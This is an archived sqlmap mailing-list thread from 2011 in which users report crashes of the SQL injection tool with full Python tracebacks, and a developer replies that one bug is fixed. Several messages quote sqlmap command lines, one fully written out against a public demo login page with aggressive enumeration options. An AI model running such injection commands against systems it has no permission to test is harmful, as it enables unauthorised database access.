line 1090, in load_global
klass = self.find_class(module, name)
File
"/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/pickle.py",
line 1126, in find_class
klass = getattr(mod, name)
AttributeError: 'module' object has no attribute 'injectionDict'
[*] shutting down at 00:14:18
Thanks
|
|
From: Zeze C. <zez...@gm...> - 2011-07-08 22:09:36
|
New fresh install. Appears to be everything ok... Or not... Data in not being shown. Sqlinjection is ok, found database, tables and columns but no data is show. Anyone having this problem? BS On 08/07/2011, Zeze Canarinha <zez...@gm...> wrote: > Sirs, > > After the update of today... :| > > [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4236), retry your > run with the latest development version from the Subversion > repository. If the exception persists, please send by e-mail to > sql...@li... the following text and any > information required to reproduce the bug. The developers will try to > reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4236) > Python version: 2.6.5 > Operating system: posix > Command line: ./sqlmap.py -u > *********************************************************************************** > --random-agent -D ************ -T ******** --columns threads 5 > Technique: UNION > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 86, in main > start() > File "/pentest/web/scanners/sqlmap/lib/controller/controller.py", > line 535, in start > __saveToSessionFile() > File "/pentest/web/scanners/sqlmap/lib/controller/controller.py", > line 166, in __saveToSessionFile > setInjection(inj) > File "/pentest/web/scanners/sqlmap/lib/core/session.py", line 55, in > setInjection > and intersect(base64unpickle(kb.resumedQueries[conf.url]["Injection > data"][:-1]).data.keys(),\ > File "/pentest/web/scanners/sqlmap/lib/core/convert.py", line 44, in > base64unpickle > return pickle.loads(base64decode(value)) > File "/usr/lib/python2.6/pickle.py", line 1374, in loads > return Unpickler(file).load() > File "/usr/lib/python2.6/pickle.py", line 858, in load > dispatch[key](self) > File "/usr/lib/python2.6/pickle.py", line 1090, in load_global > klass = self.find_class(module, name) > File "/usr/lib/python2.6/pickle.py", line 1126, in find_class > klass = getattr(mod, name) > AttributeError: 'module' object has no attribute 'injectionDict' > |
|
From: Zeze C. <zez...@gm...> - 2011-07-08 21:25:03
|
Sirs,
After the update of today... :|
[CRITICAL] unhandled exception in sqlmap/1.0-dev (r4236), retry your
run with the latest development version from the Subversion
repository. If the exception persists, please send by e-mail to
sql...@li... the following text and any
information required to reproduce the bug. The developers will try to
reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4236)
Python version: 2.6.5
Operating system: posix
Command line: ./sqlmap.py -u
***********************************************************************************
--random-agent -D ************ -T ******** --columns threads 5
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
File "./sqlmap.py", line 86, in main
start()
File "/pentest/web/scanners/sqlmap/lib/controller/controller.py",
line 535, in start
__saveToSessionFile()
File "/pentest/web/scanners/sqlmap/lib/controller/controller.py",
line 166, in __saveToSessionFile
setInjection(inj)
File "/pentest/web/scanners/sqlmap/lib/core/session.py", line 55, in
setInjection
and intersect(base64unpickle(kb.resumedQueries[conf.url]["Injection
data"][:-1]).data.keys(),\
File "/pentest/web/scanners/sqlmap/lib/core/convert.py", line 44, in
base64unpickle
return pickle.loads(base64decode(value))
File "/usr/lib/python2.6/pickle.py", line 1374, in loads
return Unpickler(file).load()
File "/usr/lib/python2.6/pickle.py", line 858, in load
dispatch[key](self)
File "/usr/lib/python2.6/pickle.py", line 1090, in load_global
klass = self.find_class(module, name)
File "/usr/lib/python2.6/pickle.py", line 1126, in find_class
klass = getattr(mod, name)
AttributeError: 'module' object has no attribute 'injectionDict'
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-08 10:14:55
|
Hi, Please find it fixed now, r4230. Thanks for reporting. Bernardo On 8 July 2011 09:40, RS <li...@gm...> wrote: > ./sqlmap.py -u > "http://www.modsecurity.org/zero.webappsecurity.com/login1.asp" --data > "login=&password=&graphicOption=minimum" --parse-errors -v 3 > --random-agent --level 5 --risk 3 --batch --dbms "Microsoft Access" --tables > > sqlmap version: 1.0-dev (r4224) > Python version: 2.6.5 > Operating system: posix > Command line: ./sqlmap.py -u > ************************************************************* --data > login=&password=&graphicOption=minimum --parse-errors -v 3 > --random-agent --level 5 --risk 3 --batch --dbms Microsoft Access --tables > Technique: None > Back-end DBMS: Microsoft Access (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 86, in main > start() > File "/test/sqlmap-dev/lib/controller/controller.py", line 552, in start > action() > File "/test/sqlmap-dev/lib/controller/action.py", line 91, in action > conf.dumper.dbTables(conf.dbmsHandler.getTables()) > File "/test/sqlmap-dev/plugins/generic/enumeration.py", line 806, in > getTables > tables = self.getTables(False) > File "/test/sqlmap-dev/plugins/generic/enumeration.py", line 867, in > getTables > query = rootQuery.inband.query > AttributeError: 'DictObject' object has no attribute 'inband' > > [*] shutting down at 01:39:31 > > The problem happens with --tables, --columns, --common-tables -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
48 messages has been excluded from this view by a project administrator.
